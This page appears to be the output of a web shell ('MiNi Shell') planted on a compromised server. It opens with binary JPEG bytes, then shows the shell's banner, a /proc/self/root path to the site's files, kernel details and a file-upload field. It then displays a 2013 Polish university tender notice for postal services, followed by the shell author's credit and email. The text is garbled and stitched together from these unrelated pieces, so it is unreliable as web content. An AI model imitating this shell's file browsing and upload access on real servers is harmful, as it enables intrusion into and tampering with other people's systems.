JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131128/490184-N-2013.html

<p class="kh_header"><b>Katowice: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym - Znak sprawy: BZP 049/16008/13</b><br>
<b>Numer ogłoszenia: 490184 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Ekonomiczny w Katowicach , ul. 1 Maja 50, 40-287 Katowice, woj. śląskie, tel. 32 2577000 w. 7108, 2577108, faks 32 257 74 99,2577108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ue.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym - Znak sprawy: BZP 049/16008/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym i zagranicznym na rzecz Zamawiającego, polegających na przyjmowaniu, sortowaniu, przemieszczaniu i doręczaniu przesyłek pocztowych na obszar całego kraju (Gabaryty A i B) i w obrocie zagranicznym (Strefa A i B), doręczaniu Zamawiającemu zwrotnych potwierdzeń odbioru po skutecznym doręczeniu, a także zwrocie do Zamawiającego przesyłek niedoręczonych odbiorcy po wyczerpaniu wszystkich możliwości ich doręczenia lub wydania oraz usługa odbioru przesyłek z siedziby Zamawiającego.
2. Przez przesyłki będące przedmiotem zamówienia rozumie się niżej wymienione typy przesyłek:
a. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki nierejestrowane (zwykłe) ekonomiczne, nie będące przesyłkami najszybszej kategorii, 
b. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki nierejestrowane (zwykłe) priorytetowe, będące przesyłkami najszybszej kategorii,
c. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki rejestrowane (polecone) ekonomiczne, nie będące przesyłkami najszybszej kategorii, przyjęte za potwierdzeniem nadania, 
d. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki rejestrowane (polecone) priorytetowe, będące przesyłkami najszybszej kategorii, przyjęte za potwierdzeniem nadania, 
e. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki rejestrowane (polecone) ekonomiczne ze zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii, przyjęte za potwierdzeniem nadania i doręczone za potwierdzeniem odbioru, z dodatkową usługą polegającą na doręczeniu nadawcy (Zamawiającemu) formularza z pokwitowaniem odbioru przesyłki przez adresata, 
f. przesyłki w obrocie krajowym i zagranicznym - listowe i paczki rejestrowane (polecone) priorytetowe ze zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane będące przesyłkami najszybszej kategorii, przyjęte za potwierdzeniem nadania i doręczone za potwierdzeniem odbioru, z dodatkową usługą polegającą na doręczeniu nadawcy (Zamawiającemu) formularza z pokwitowaniem odbioru przesyłki przez adresata.
3. Wymiary przesyłek listowych: 
a. Gabaryt A to przesyłki o wymiarach: minimum: wymiary strony adresowej nie mogą być mniejsze niż 90x140 mm, maksimum: żaden z wymiarów nie może przekraczać: wysokości 20 mm, długości 325 mm, szerokości 230 mm. 
b. Gabaryt B to przesyłki o wymiarach: minimum: jeżeli choć jeden z wymiarów przekracza wartość określoną, jako maksimum w gabarycie A, maksimum: suma długości, szerokości i wysokości nie może przekroczyć 900 mm, przy czym długość nie może przekroczyć 600 mm.
4. Wymiary paczek: 
a. Gabaryt A to przesyłki o wymiarach: minimum: wymiary strony adresowej nie mogą być mniejsze niż 90x140 mm, maksimum: żaden z wymiarów nie może przekraczać: wysokości 300 mm, długości 600 mm, szerokości 500 mm. 
b. Gabaryt B to przesyłki o wymiarach: minimum: jeżeli choć jeden z wymiarów przekracza wartość określoną, jako maksimum w gabarycie A, maksimum: suma długości i największego obwodu mierzonego w innym kierunku niż długość nie przekracza 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm.
5. Od Wykonawcy (w zakresie świadczenia usług) wymaga się:
a. doręczania przesyłek do każdego wskazanego przez Zamawiającego adresu na terenie całego kraju, w Europie i poza nią,
b. doręczania przesyłek do adresatów w kopertach i opakowaniach oryginalnych, przekazanych przez Zamawiającego,
c. możliwości zastąpienia znaczka opłaty pocztowej pieczęcią dostarczoną przez Wykonawcę lub wykonaną wg wzoru dostarczonego przez Wykonawcę, którą Zamawiający będzie umieszczał w miejscu przeznaczonym na znaczek opłaty pocztowej,
d. odbierania przez przedstawiciela Wykonawcy z siedziby Zamawiającego przesyłek pocztowych celem ich nadania - codziennie (w dni robocze, tj. od poniedziałku do piątku), w godz. 13.30 - 14.00,
e. legitymowania się, przez przedstawiciela Wykonawcy odbierającego przesyłki, stosownym upoważnieniem do odbioru przesyłek z siedziby Zamawiającego w celu dostarczenia ich do placówki pocztowej Wykonawcy,
f. każdorazowego potwierdzania przez przedstawiciela Wykonawcy (pieczęcią, podpisem i datą), wg poszczególnych rodzajów i kategorii wagowych, odbioru przesyłek pocztowych przyjętych do nadania, w momencie ich odbioru w siedzibie Zamawiającego: na zestawieniu ilościowo-wartościowym, według poszczególnych rodzajów i kategorii wagowych, przesyłek pocztowych przyjętych do nadania, w pocztowej książce nadawczej, przesyłek pocztowych rejestrowanych przyjętych do nadania,
g. nadawania przesyłek przez Wykonawcę w dniu ich przyjęcia od Zamawiającego; w przypadku zastrzeżeń dotyczących odebranych przesyłek, Wykonawca wyjaśnia je z Zamawiającym telefonicznie; przy braku możliwości ich wyjaśnienia z Zamawiającym lub ich usunięcia w dniu ich odbioru, nadanie odebranych przesyłek nastąpi w następnym dniu roboczym,
h. zabezpieczania przesyłki w przypadku jej uszkodzenia oraz nanoszenia adnotacji z informacją o osobie dokonującej zabezpieczenia,
i. dostarczania przesyłek do siedziby Zamawiającego - codziennie (w dni robocze, tj. od poniedziałku do piątku), w godz. 08.00 - 10.00, 
j. nadawania przesyłek, w przypadku braku zastrzeżeń dotyczących ich oznaczenia, w placówce pocztowej Wykonawcy w tym samym dniu, w którym zostały odebrane przez przedstawiciela Wykonawcy z siedziby Zamawiającego,
k. sukcesywnego dostarczania Zamawiającemu Formularza potwierdzenia odbioru przesyłek rejestrowanych za zwrotnym potwierdzeniem odbioru, przez cały czas trwania Umowy w ilości zabezpieczającej potrzeby Zamawiającego w tym zakresie.
6. Zamawiający wymaga, aby Wykonawca posiadał odpowiednią liczbę placówek zdawczo-odbiorczych, w celu umożliwienia odbioru awizowanych przesyłek - co najmniej na terenie każdej gminy lub gminy sąsiedniej na terenie Rzeczypospolitej Polskiej. Placówki powinny być czynne we wszystkie dni robocze, co najmniej 5 dni w tygodniu.
7. Zamawiający wymaga, aby datą wiążącą była data nadania przesyłki w placówce pocztowej Wykonawcy.
8. Potwierdzenie nadania musi jednoznacznie określać datę przyjęcia przesyłki i identyfikować placówkę pocztową Wykonawcy, która nadała przesyłkę.
9. Przesyłki powinny być doręczane z zachowaniem wskaźników terminowości doręczeń określonych w Rozporządzeniu Ministra Administracji i Cyfryzacji z dnia 29 kwietnia 2013 roku w sprawie warunków wykonywania usług powszechnych przez operatora wyznaczonego (Dz. U. z 2013 r., poz. 545). Niedopuszczalne jest nieuzasadnione przetrzymywanie przesyłek przez Wykonawcę. Zamawiający zastrzega sobie możliwość kontrolowania u adresatów terminowości dostarczania przesyłek.
10.Szczegółowy opis przedmiotu zamówienia znajduje się w treści Specyfikacji Istotnych Warunków Zamówienia obowiązującej w niniejszym postępowaniu o udzielne zamówienia publicznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1, 60.16.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości: 15 000,00 zł. (słownie: piętnaście tysięcy złotych).
2. Wadium należy wnieść przed upływem terminu składania ofert. 
3. Wadium może być wnoszone w jednej lub w kilku następujących formach:
- W pieniądzu;
- Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- Gwarancjach bankowych;
- Gwarancjach ubezpieczeniowych;
- Poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. 65 1050 1214 1000 0007 0000 7974 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem zaleca się dołączyć do oferty.
5. Dane banku do przelewu zagranicznego: ING BANK ŚLĄSKI Spółka Akcyjna; Ul. Mickiewicza 3, 40-951 Katowice; IBAN - PL 65 1050 1214 1000 0007 0000 7974; BIC (kod SWIFT) - INGBPLPW
6. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w Biurze Zamówień Publicznych w pok. nr 7 bud. E najpóźniej w dniu wyznaczonym, jako termin składania ofert do godz. 11:00. Natomiast do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię.
7. Wadium dla konsorcjum może być wniesione przez lidera konsorcjum lub przez wskazanego w umowie konsorcjum partnera.
8. Wadium, bez względu na sposób jego wniesienia, musi obejmować cały okres związania ofertą.  
9. Zamawiający dokona zwrotu wadium zgodnie z postanowieniami art. 46 ust 1 - 4 ustawy Pzp.
10. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli wystąpią okoliczności, o których mowa w określone w art. 46 ust. 4a i 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności poprzez wykazanie, że są operatorem pocztowym wpisanym do rejestru prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 roku Prawo pocztowe (Dz. U. z 2012 r., poz. 1529).

2. W celu potwierdzenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, zobowiązany jest złożyć aktualne zaświadczenie o wpisie do Rejestru operatorów pocztowych wydane przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (tekst jednolity z 2012 r., poz. 1529),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące posiadania wiedzy i doświadczenia, rozumianych jako wykazanie, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje, co najmniej dwie usługi (1 usługa = 1 umowa) polegające na świadczeniu usług pocztowych, tj. przyjmowaniu, sortowaniu, przemieszczaniu i doręczaniu przesyłek pocztowych o łącznej wartości co najmniej 500 000,00 zł brutto, w tym przynajmniej jednej o wartości co najmniej 350 000,00 zł brutto, przy czym każda z tych usług wykonywana była lub jest przez okres minimum 12 miesięcy. 

2. W celu potwierdzenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące posiadania niezbędnej wiedzy i doświadczenia, zobowiązany jest złożyć następujące dokumenty:
a. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, sporządzony według wzoru Formularz nr 3,
b. dowody, że wykazane usługi zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące dysponowania odpowiednim potencjałem technicznym.
2. Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny spełniania powyższego warunku. Warunek zostanie uznany za spełniony, w przypadku gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego formularz nr 2A SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia.
2. Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny spełniania powyższego warunku. Warunek zostanie uznany za spełniony, w przypadku gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego formularz nr 2A SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Pzp dotyczące sytuacji ekonomicznej i finansowej.
2. Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny spełniania powyższego warunku. Warunek zostanie uznany za spełniony, w przypadku gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego formularz nr 2A SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego formularz nr 2A SIWZ. 
2. Oryginał pełnomocnictwa lub notarialnie poświadczona kopia dla osoby podpisującej ofertę w przypadku, gdy wykonawca nie ma możliwości osobistego podpisania oferty. W przypadku udzielenia pełnomocnictwa wymagana jest forma i rodzaj właściwy do poszczególnych czynności. 
3. Pełnomocnictwo do reprezentowania konsorcjum wykonawcy w postępowaniu o udzielenie zamówienia publicznego, albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Ceny jednostkowe podane przez Wykonawcę w Formularzu cenowym (Załącznik nr 1 do Umowy) nie będą ulegały zmianom przez cały okres obowiązywania Umowy, za wyjątkiem ustawowej zmiany stawki podatku od towarów i usług na usługi pocztowe oraz zaakceptowanej przez Prezesa Urzędu Komunikacji Elektronicznej zmiany taryfikatorów opłat pocztowych, pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę zmianę (art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych).
2. W przypadku nadawania przez Zamawiającego przesyłek nie ujętych w Formularzu cenowym (Załącznik nr 1 do Umowy), podstawą rozliczeń będą ceny z aktualnego cennika usług Wykonawcy dostarczonego w formie pisemnej Zamawiającemu lub zamieszczonego na stronie internetowej Wykonawcy.
3. Zamawiający zastrzega sobie możliwość wcześniejszego wypowiedzenia Umowy z miesięcznym okresem wypowiedzenia, w przypadku niewykonania lub nienależytego wykonywania Umowy, tj. w szczególności: utraty, ubytku, uszkodzenia przesyłek, opóźnienia w odbiorze i dostarczaniu przesyłek, niezgodnego z Umową przepakowywania przesyłek dostarczanych przez Zamawiającego, niezgodnej z Umową podwyżki cen usług, braku gwarantowanego skutku nadania pisma (moc doręczenia) oraz skutku potwierdzenia przyjęcia przesyłki (moc dokumentu urzędowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ue.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Ekonomiczny w Katowicach; Biuro Zamówień Publicznych, ul. 1 Maja 47, pok. nr 11 bud. E, 40-287 Katowice..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2013 godzina 11:00, miejsce: Uniwersytet Ekonomiczny w Katowicach; Biuro Zamówień Publicznych, ul. 1 Maja 47, pok. nr 11 bud. E, 40-287 Katowice..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com